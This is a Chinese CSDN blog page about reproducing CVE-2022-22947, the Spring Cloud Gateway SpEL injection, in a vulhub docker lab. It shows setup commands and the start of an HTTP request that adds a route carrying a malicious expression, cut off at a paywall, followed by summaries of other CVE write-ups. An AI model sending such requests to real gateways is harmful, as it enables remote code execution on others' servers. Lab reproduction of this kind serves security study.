每日一漏洞（cve-2022-22947）

最新推荐文章于 2024-09-03 12:01:06 发布

炼金术师诸葛亮

最新推荐文章于 2024-09-03 12:01:06 发布

阅读量89

点赞数

文章标签：安全

本文链接：https://blog.csdn.net/jjjj1029056414/article/details/131761858

版权

该文描述了如何通过docker-compose搭建环境来重现Spring框架中的CVE-2022-22947漏洞。用户首先启动服务，然后利用BurpSuite发送特定的HTTP请求，包括添加恶意SpEL表达式的路由和触发表达式执行的请求，最终查看执行结果。

摘要由CSDN通过智能技术生成

环境搭建

cd vulhub/spring/CVE-2022-22947
docker-compose up -d

服务启动后，访问http://ip:8080即可看到演示页面

漏洞复现

burp发送数据包添加一个包含恶意SpEL表达式的路由

POST /actuator/gateway/routes/hacktest HTTP/1.1

Host: 192.168.41.130:8080

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

X-Forwarded-For: 127.0.0.1

If-Modified-Since: Thu, 17 Oct 2019 07:18:26 GMT

If-None-Match: "3147526947+ident"

Content-Type: application/json

Content-Length: 333



{

  "id": "hacktest",

  "filters": [{

    "nam

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

炼金术师诸葛亮

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

Wordpress Ajax Load More plugins CVE-2022-2943授权任意文件下载漏洞分析

afei001

03-28

443

CVE-2022-2943授权任意文件下载漏洞分析

[漏洞挖掘与防护] 01.漏洞利用之CVE-2019-0708复现及防御详解（含学习路线）

杨秀璋的专栏

07-10

669

这是作者新开的一个专栏——“漏洞挖掘与防护”。第一篇文章将详细介绍Windows远程桌面服务漏洞（CVE-2019-0708），该高危漏洞利用方式是通过远程桌面端口3389，RDP协议进行攻击，堪比WannaCry。希望对入门的同学有帮助。您的点赞、评论、收藏将是对我最大的支持，感恩安全路上一路前行，如果有写得不好的地方，可以联系我修改。基础性文章，希望对您有所帮助！

1 条评论您还未登录，请先登录后发表或查看评论

CVE-2022-47945漏洞分析资料

xillianpeng的专栏

07-05

399

ThinkPHP是一个在中国使用较多的PHP框架。在其6.0.13版本及以前，存在一处本地文件包含漏洞。当多语言特性被开启时，攻击者可以使用lang参数来包含任意PHP文件。虽然只能包含本地PHP文件，但在开启了register_argc_argv且安装了pcel/pear的环境下，可以包含/usr/local/lib/php/pearcmd.php并写入任意文件。

Spring Cloud Gateway 远程代码执行漏洞（CVE-2022-22947）修复手册（SOP）

最新发布

weixin_43727442的博客

09-03

112

该漏洞（CVE-2022-22947）因其潜在的巨大风险，被列为 2024 重保季必修漏洞，普遍存在于各类相关的应用系统中。例如，在一些企业的内部管理系统、金融交易平台以及政务服务网站等关键业务场景中，都发现了这一漏洞的踪迹。若不及时修复，可能会导致数据泄露、系统瘫痪甚至更为严重的安全事故。

网络靶场实战--BIG-IP CVE漏洞分析(CVE-2022-41622)(CVE-2022-41800)

蛇矛实验室

12-13

1349

这一小节，我们简单分析了F5设备的俩个pre-auth漏洞，了解了rpm注入和csrf漏洞产生原因。并且在此过程中我们简单学习F5设备中 soap接口和rest接口的区别以及利用。蛇矛实验室成立于2020年，致力于安全研究、攻防解决方案、靶场对标场景仿真复现及技战法设计与输出等相关方向。团队核心成员均由从事安全行业10余年经验的安全专家组成，团队目前成员涉及红蓝对抗、渗透测试、逆向破解、病毒分析、工控安全以及免杀等相关领域。

探索安全漏洞：CVE-2022-1802, CVE-2022-1529, & CVE-2022-2200 对Firefox的影响测试

gitblog_00013的博客

06-12

359

探索安全漏洞：CVE-2022-1802, CVE-2022-1529, & CVE-2022-2200 对Firefox的影响测试项目地址:https://gitcode.com/mistymntncop/CVE-2022-1802 在这个开源项目中，我们专注于研究和测试三个重要的安全漏洞：CVE-2022-1802、CVE-2022-1529和CVE-2022-2200。这些漏洞已被...

探索微软Windows Contacts中的安全漏洞：CVE-2022-44666的深度解析与应用

gitblog_00043的博客

06-11

485

探索微软Windows Contacts中的安全漏洞：CVE-2022-44666的深度解析与应用项目地址:https://gitcode.com/j00sean/CVE-2022-44666 在信息安全的浩瀚宇宙中，每一个被遗忘的安全漏洞都可能是黑客眼中的宝藏。今天，我们要揭秘的是一个围绕Microsoft Windows Contacts应用程序的长期未修复的0day漏洞——CVE-2022...

每日一漏洞（cve-2021-45232）

jjjj1029056414的博客

07-27

117

复现漏洞cve-2021-45232（Apache APISIX Dashboard API权限绕过导致RCE）

每日一漏洞（cve-2023-25157，cve-2023-23752）

jjjj1029056414的博客

07-07

394

每日复现一漏洞（cve-2023-25157GeoServer OGC Filter SQL注入漏洞，cve-2023-23752Joomla权限绕过漏洞）

CVE-2022-0410

07-25

很抱歉，我没有找到与CVE-2022-0410相关的信息。请确认CVE编号是否正确，并提供更多相关信息，我将尽力帮助您。 #### 引用[.reference_title] - *1* *2* *3* [WuThreat身份安全云-TVD每日漏洞情报-2023-01-29]...

影响分析：RubyGems未授权访问漏洞（CVE-2022-29176）

weixin_49715102的博客

07-11

481

2022年5月6日，RubyGems披露存在一个可导致未授权访问的漏洞（CVE-2022-29176），该漏洞的CVSS评分为9.9。 RubyGems发布安全公告指出，“由于 yank 操作中存在一个漏洞，因此任何 RubyGems.org 用户都能越权删除并取代某些gems。” 本篇文章将分析CVE-2022-29176漏洞的性质，带来的影响评估和事件分析。...

Zoo Management System 跨站脚本漏洞(CVE-2022-31914)

weixin_68999845的博客

08-16

387

漏洞名称：Zoo Management System 跨站脚本漏洞·漏洞编号：CVE-2022-31914·漏洞类型：跨站脚本漏洞·漏洞威胁等级：中危·影响范围：Zoo Management System v1.0·利用条件：Zoo Management System v1.0 | PHP V 5.6或 7.4。

taoCMS SQL注入漏洞（CVE-2022-25505）

weixin_68999845的博客

08-16

724

可以看出，更新函数不过滤id。最后，将 id 引入 updatelist 函数进行更新，可以看出，总共执行了三个 SQL 语句，并且没有一个 id 被过滤。1.进入后台（/taocms/admin/admin.php?POST请求uri：admin/admin.php，参数id后跟随恶意的sql注入语句，其他参数不存在注入条件。1.下载源码到本地 https://github.com/taogogo/taocms。源码下载url：https://github.com/taogogo/taocms。

WeBid 文件读取漏洞 (CVE-2022-41477) 漏洞复现

weixin_68999845的博客

07-31

394

WeBid 1.2.2及之前版本存在安全漏洞，该漏洞源于admin/theme.php 文件中的服务器端请求伪造 (SSRF) 漏洞允许远程攻击者通过主题参数注入有效负载以跨目录读取文件。post url：admin/theme.php，参数file后跟敏感文件，theme后跟路径（会出现/…1.将源码下载到本地：https://github.com/renlok/WeBid。源码下载url：https://github.com/renlok/WeBid。·漏洞名称：WeBid 文件读取漏洞。

CVE-2022-31137 Roxy-WI未经身份验证的远程代码执行漏洞复现

热爱学习，喜欢折腾！

11-09

2055

Roxy-WI是开源的一款用于管理 Haproxy、Nginx 和 Keepalived 服务器的 Web 界面。Roxy-WI 6.1.1.0 之前的版本存在安全漏洞，该漏洞源于系统命令可以通过 subprocess_execute 函数远程运行，远程攻击者利用该漏洞可以执行远程代码。

AeroCMS v0.0.1 任意文件上传漏洞(CVE-2022-27061)

weixin_68999845的博客

07-21

480

参数$post_image在上传时并未做任何过滤，直接上传任意而已文件即可，上传路径为images/xxx。1.按照源码下载:https://github.com/MegaTKC/AeroCMS。源码下载url：https://github.com/MegaTKC/AeroCMS。2.点击“选择文件”，上传任意文件，此处上传phpinfo.php。3.上传uri为：/images/phpinfo.php。·漏洞名称：AeroCMS 任意文件上传。·影响范围：v 0.0.1。·漏洞类型：文件上传漏洞。

Spring Cloud Gateway 远程代码执行漏洞（CVE-2022-22947）

hjseo_seg的博客

08-02

594

SpringCloudGateway是SpringCloud下的一个项目，该项目是基于Spring5.0、SpringBoot2.0和ProjectReactor等技术开发的网关，它旨在为微服务架构提供一种简单有效、统一的API路由管理方式。使用SpringCloudGateway的应用如果对外暴露了GatewayActuator接口，则可能存在被CVE-2022-22947漏洞利用的风险。，获取系统权限。漏洞利用的前置条件。...

JavaScript学习笔记（二十）DOM动画效果

2401_84254011的博客

04-28

572

/0 ~ 100}else{//100// 3. 速度取整;}else{}else{// 4. 终止条件;} , 50)

cve-2022-22947漏洞原理

07-29

根据引用\[1\]和引用\[2\]的信息，CVE-2022-22947漏洞是Spring Cloud Gateway中的一处命令注入漏洞。攻击者可以通过利用此漏洞执行SpEL表达式，从而在目标服务器上执行任意恶意代码，获取系统权限。具体来说，当使用...